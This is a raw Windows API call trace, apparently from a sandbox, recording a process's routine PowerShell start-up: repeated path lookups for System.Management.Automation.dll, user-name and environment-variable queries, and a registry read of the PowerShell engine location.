	[0303.989] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd470 | out: lpFileInformation=0x1cd470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0303.989] SetErrorMode (uMode=0x1) returned 0x1
	[0303.989] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0303.989] SetErrorMode (uMode=0x1) returned 0x1
	[0303.989] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd470 | out: lpFileInformation=0x1cd470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0303.989] SetErrorMode (uMode=0x1) returned 0x1
	[0303.989] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0303.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1cd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0303.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0303.989] SetErrorMode (uMode=0x1) returned 0x1
	[0303.989] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd470 | out: lpFileInformation=0x1cd470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0303.990] SetErrorMode (uMode=0x1) returned 0x1
	[0303.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0303.990] SetErrorMode (uMode=0x1) returned 0x1
	[0303.990] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd470 | out: lpFileInformation=0x1cd470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0303.990] SetErrorMode (uMode=0x1) returned 0x1
	[0303.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0303.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1cd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0303.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0303.995] SetErrorMode (uMode=0x1) returned 0x1
	[0303.995] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd730 | out: lpFileInformation=0x1cd730*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0303.995] SetErrorMode (uMode=0x1) returned 0x1
	[0303.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.914] CoTaskMemAlloc (cb=0x804) returned 0x1b84f080
	[0304.914] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84f080, nSize=0x1cda98 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cda98) returned 0x1
	[0304.915] CoTaskMemFree (pv=0x1b84f080) 
	[0304.915] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0304.915] GetUserNameW (in: lpBuffer=0x292480, pcbBuffer=0x1cdad8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cdad8) returned 1
	[0304.915] CoTaskMemFree (pv=0x292480) 
	[0304.915] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fcb5e0*="Available", lpRawData=0x2fcb370) returned 1
	[0305.913] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0305.913] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.913] CoTaskMemFree (pv=0x246570) 
	[0305.913] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0305.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.914] CoTaskMemFree (pv=0x246570) 
	[0305.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.917] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0305.917] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0305.917] CoTaskMemFree (pv=0x246570) 
	[0305.917] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0305.917] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0305.917] CoTaskMemFree (pv=0x246570) 
	[0305.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.919] GetCurrentProcessId () returned 0x984
	[0305.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.921] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdab8 | out: phkResult=0x1cdab8*=0x38c) returned 0x0
	[0305.922] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cda3c, lpData=0x0, lpcbData=0x1cda38*=0x0 | out: lpType=0x1cda3c*=0x1, lpData=0x0, lpcbData=0x1cda38*=0x56) returned 0x0
	[0305.922] CoTaskMemAlloc (cb=0x5a) returned 0x2a16a0
	[0305.922] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cda0c, lpData=0x2a16a0, lpcbData=0x1cda08*=0x56 | out: lpType=0x1cda0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cda08*=0x56) returned 0x0
	[0305.922] CoTaskMemFree (pv=0x2a16a0) 
	[0305.922] RegCloseKey (hKey=0x38c) returned 0x0
	[0305.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.923] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0305.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.923] CoTaskMemFree (pv=0x246570) 
	[0305.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
